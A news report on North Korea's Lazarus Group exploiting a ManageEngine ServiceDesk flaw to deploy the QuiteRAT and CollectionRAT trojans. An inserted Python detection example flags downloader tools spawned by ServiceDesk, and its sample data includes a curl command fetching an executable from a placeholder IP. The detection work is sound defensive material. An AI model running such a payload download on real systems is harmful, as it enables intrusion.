North Korean Lazarus Group Exploits ManageEngine Vulnerability to Launch Cyber Attacks

August 24, 2023

The North Korean state-sponsored hacker group known as Lazarus has been exploiting a severe vulnerability, CVE-2022-47966, in Zoho's ManageEngine ServiceDesk to infiltrate an internet backbone infrastructure provider and various healthcare organizations. The group's activities began early this year, targeting entities in the U.S. and U.K. with the intent of deploying the QuiteRAT malware and a newly discovered remote access trojan (RAT) dubbed CollectionRAT.

CollectionRAT was discovered when researchers analyzed the infrastructure used in these campaigns, which Lazarus had also used for other attacks. Cisco Talos researchers noted attacks against UK internet firms in early 2023, where Lazarus took advantage of the CVE-2022-47966 exploit, a pre-authentication remote code execution flaw affecting multiple Zoho ManageEngine products. Cisco Talos stated, "In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in the United Kingdom to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access."

The researchers found that Lazarus began using the exploit just five days after it became publicly available. Multiple threat actors have since leveraged the exploit in their attacks, as observed by Rapid7, Shadowserver, and GreyNoise, leading CISA to issue a warning to organizations. After exploiting the vulnerability to infiltrate a target, Lazarus hackers downloaded the QuiteRAT malware from an external URL using a curl command.
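The post-exploitation step described above, a ManageEngine ServiceDesk process spawning curl to fetch a payload from an external URL, is the kind of behaviour a process-creation detection can catch. The following is an added example, not code from the article or from Cisco Talos; the ServiceDesk install path and java process name are assumptions about a typical deployment, and the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Detection over process-creation telemetry: ServiceDesk (java) spawning a
# command-line downloader pointed at a non-local URL. Paths are assumptions.

@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str

# Parent processes treated as the ServiceDesk application server (assumed path).
SERVICEDESK_PARENT = re.compile(r"[\\/]ManageEngine[\\/].*[\\/]java(\.exe)?$", re.I)
# Command-line download utilities a web application should not normally spawn.
DOWNLOADER = re.compile(r"(?:^|[\\/])(curl|wget|certutil|bitsadmin)(\.exe)?$", re.I)
# An http(s) URL whose host is neither loopback nor RFC 1918 private space.
EXTERNAL_URL = re.compile(
    r"https?://(?!(?:127\.\d+\.\d+\.\d+|localhost|10\.|192\.168\.|172\.(?:1[6-9]|2\d|3[01])\.))[^\s\"']+",
    re.I,
)

def is_suspicious(ev: ProcessEvent) -> bool:
    """True when ServiceDesk spawns a downloader aimed at an external URL."""
    return bool(
        SERVICEDESK_PARENT.search(ev.parent_image)
        and DOWNLOADER.search(ev.image)
        and EXTERNAL_URL.search(ev.command_line)
    )

def find_suspicious(events: list[ProcessEvent]) -> list[ProcessEvent]:
    return [ev for ev in events if is_suspicious(ev)]

# Constructed sample telemetry; the 198.51.100.0/24 host is a documentation range, not a real IoC.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
                 r"C:\Windows\System32\curl.exe",
                 "curl.exe -o C:\\Windows\\Temp\\u.exe http://198.51.100.7/u.exe"),
    ProcessEvent(r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
                 r"C:\Windows\System32\curl.exe",
                 "curl.exe http://127.0.0.1:8080/healthcheck"),    # loopback: benign
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\curl.exe",
                 "curl.exe https://example.com/"),                  # parent is not ServiceDesk
    ProcessEvent(r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),                                 # no downloader involved
]
```

Only the first sample event matches all three conditions; the other three show the false positives the loopback and parent-process checks filter out.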

QuiteRAT, discovered in February 2023, is a simple yet potent remote access trojan that seems to be an upgrade from the well-known MagicRAT that Lazarus used in the second half of 2022 to target energy providers in the U.S., Canada, and Japan. Researchers have noted that QuiteRAT's code is more streamlined than MagicRAT's, and the judicious selection of Qt libraries has reduced its size from 18MB to 4MB while maintaining the same set of functions.

In a separate report, Cisco Talos revealed that Lazarus hackers have developed a new malware named CollectionRAT. This new threat was discovered after researchers examined the infrastructure that the actor used in other attacks. Researchers believe that CollectionRAT is related to the "EarlyRAT" family, which Kaspersky linked earlier this year to Andariel ("Stonefly"), considered to be a subgroup within the Lazarus team.

CollectionRAT's capabilities include arbitrary command execution, file management, system information gathering, reverse shell creation, new process spawning, fetching and launching new payloads, and self-deletion. CollectionRAT also incorporates the Microsoft Foundation Class (MFC) framework, enabling it to decrypt and execute its code on the fly, evade detection, and hinder analysis.

Cisco Talos also highlighted the evolution in Lazarus' tactics, techniques, and procedures, including the extensive use of open-source tools and frameworks like Mimikatz for stealing credentials, PuTTY Link (Plink) for remote tunneling, and DeimosC2 for command and control communication. This strategy aids Lazarus in leaving fewer distinct traces, thereby complicating attribution, tracking, and the development of effective protective measures.
